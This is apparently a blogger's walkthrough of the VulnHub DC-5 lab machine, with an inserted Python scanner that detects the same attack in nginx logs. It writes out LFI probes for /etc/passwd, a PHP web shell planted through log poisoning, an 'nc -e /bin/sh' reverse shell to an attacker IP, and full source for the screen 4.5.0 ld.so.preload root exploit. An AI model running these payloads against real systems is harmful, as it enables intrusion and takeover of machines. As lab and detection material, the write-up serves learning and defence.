vulnhub DC-5 notes

Published 2022-01-09


1. nmap -sP 192.168.0.100/24   As usual, start by locating the target's IP; it turns out to be 192.168.0.149
2. nmap -A -p 1-65535 192.168.0.149   With the IP known, scan the ports: 80/111/37380
3. Browsing port 80 shows nothing obvious, and a dirb run turns up nothing usable either. Eventually, on the page returned after submitting the form, there is a file inclusion issue: the year changes on every refresh, so presumably a parameter is being passed via GET???
4. Test it with wfuzz: wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.0.100/thankyou.php?FUZZ=/etc/passwd
200 70 L 104 W 2319 Ch "file"
http://192.168.0.100/thankyou.php?file=/etc/passwd   testing it, the file contents are echoed back
5. whatweb -v 192.168.0.100   With the vulnerability found, gather information for a reverse shell; the server is nginx 1.6.2
Read /etc/nginx/nginx.conf for the nginx log file locations: /var/log/nginx/access.log and error_log /var/log/nginx/error.log. Try including them: success. Use the log to get a reverse shell.
6. GET /thankyou.php?file=<?php system($_GET['shell']);?> HTTP/1.1   Use the form submission to write a one-line PHP shell into the log,
7. GET /thankyou.php?file=/var/log/nginx/error.log&shell=ls HTTP/1.1   test it: commands execute
GET /thankyou.php?file=/var/log/nginx/error.log&shell=nc -e /bin/sh 192.168.0.103 999 HTTP/1.1   send this to call back; on kali listen locally with nc -lvp 9999 on port 9999,
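Both stages of the LFI-to-log-poisoning chain above leave a distinctive trace in the same nginx logs that get abused. The following is an added example, not part of the original write-up, that flags those request patterns in access.log and error.log lines; the log lines are constructed, and the log paths are the ones the write-up read from /etc/nginx/nginx.conf.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Files an include() parameter should never name, plus the nginx logs the
# write-up read from /etc/nginx/nginx.conf (the targets of log poisoning).
SENSITIVE_PATHS = ("/etc/passwd", "/etc/shadow", "/proc/self/")
LOG_PATHS = ("/var/log/nginx/access.log", "/var/log/nginx/error.log")
PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)
# nginx "combined" access.log line, and the request: "..." field of error.log.
ACCESS_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>.*?) HTTP/[\d.]+" \d{3}')
ERROR_RE = re.compile(r'client: (?P<ip>[\d.]+), .*?request: "[A-Z]+ (?P<target>.*?) HTTP/[\d.]+"')

def classify_target(target):
    """Return sorted reasons why one request target looks like LFI abuse."""
    reasons = set()
    if PHP_TAG.search(unquote(target)):
        reasons.add("php-tag")  # code sent so it gets logged, then included
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for name, values in params.items():
        for value in values:
            if "../" in value or value.startswith(SENSITIVE_PATHS + LOG_PATHS):
                reasons.add(f"lfi:{name}")
            if value.startswith(LOG_PATHS):
                reasons.add(f"log-include:{name}")  # poisoning, second stage
    return sorted(reasons)

def scan_log(lines):
    """Return one finding per suspicious access.log or error.log line."""
    findings = []
    for line in lines:
        match = ACCESS_RE.match(line) or ERROR_RE.search(line)
        if match and (reasons := classify_target(match["target"])):
            findings.append({"ip": match["ip"], "target": match["target"],
                             "reasons": reasons})
    return findings

# Constructed sample: benign hit, /etc/passwd probe, URL-encoded <?php
# poisoning request, error.log include chained with shell=ls, error.log traversal.
SAMPLE_LINES = [
    '192.168.0.103 - - [09/Jan/2022:10:00:01 +0800] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '192.168.0.103 - - [09/Jan/2022:10:00:02 +0800] "GET /thankyou.php?file=/etc/passwd HTTP/1.1" 200 2319 "-" "Mozilla/5.0"',
    '192.168.0.103 - - [09/Jan/2022:10:00:03 +0800] "GET /thankyou.php?file=%3C%3Fphp%20system(%24_GET%5B%27shell%27%5D)%3B%3F%3E HTTP/1.1" 200 70 "-" "Mozilla/5.0"',
    '192.168.0.103 - - [09/Jan/2022:10:00:04 +0800] "GET /thankyou.php?file=/var/log/nginx/error.log&shell=ls HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '2022/01/09 10:00:05 [error] 1234#0: *7 FastCGI sent in stderr: "PHP Warning: include(): failed" while reading upstream, client: 192.168.0.103, server: _, request: "GET /thankyou.php?file=../../../../etc/passwd HTTP/1.1"',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LINES):
        print(finding["ip"], finding["reasons"], finding["target"])
```

Feeding real logs through scan_log (one line per call to classify_target) is enough to surface the probe, the poisoning request and the later include of the log file as three separate events from the same client.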
8. Reverse shell obtained; id shows an ordinary user…
python -c 'import pty;pty.spawn("/bin/bash")'   spawn an interactive shell
9. sudo -l   fails
find / -perm -4000 -user root 2>/dev/null   look for files that could be used for privilege escalation
searchsploit screen 4.5.0   on kali, check searchsploit for exploits affecting this binary; screen is a terminal multiplexer
cp /usr/share/exploitdb/exploits/linux/local/41154.sh 41154.sh   copy the script to the desktop.
vim libhax.c
#include <stdio.h>
#include <sys/stat.h>   /* chmod */
#include <sys/types.h>
#include <unistd.h>
/* constructor: runs as soon as the library is loaded */
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
Then compile it:
gcc -fPIC -shared -ldl -o libhax.so libhax.c
This produces libhax.so; delete the original .c file.
Next copy the second piece of code into rootshell.c:
gcc -o rootshell rootshell.c   and delete the .c file: rm -f rootshell.c
Finally edit the original .sh file as follows and, when saving, run :set ff=unix (which tells vi to write unix line endings)
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell
Then in vi:
:set ff=unix
:wq!
The script is done.
10. python -m SimpleHTTPServer 80   use python to stand up a temporary HTTP server; wget failed, so the three files have to be sent to the target with nc instead: on kali nc -lvp 5555 < rootshell, on the target
nc 192.168.0.103 5555 > rootshell; once the transfer finishes, ctrl+c on kali to close the connection and move on to the next file
11. cd /etc
umask 000
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
screen -ls
/tmp/rootshell
id
We are root now
cd /root
ls
cat thisistheflag.txt

[ASCII-art banner printed by thisistheflag.txt; its layout was lost in extraction]

Once again, a big thanks to all those who do these little challenges,
and especially all those who give me feedback - again, it's all greatly
appreciated. :-)

I also want to send a big thanks to all those who find the vulnerabilities
and create the exploits that make these challenges possible.

end

Takeaways

1. Transferred files successfully with nc

2. python -c 'import pty;pty.spawn("/bin/bash")'   spawns an interactive shell

3. python -m SimpleHTTPServer 80   stands up a temporary HTTP server with python

4. Using the searchsploit tool to find exploits

5. wfuzz usage: see reference article 1

子夜不哭
Last updated 2022-01-09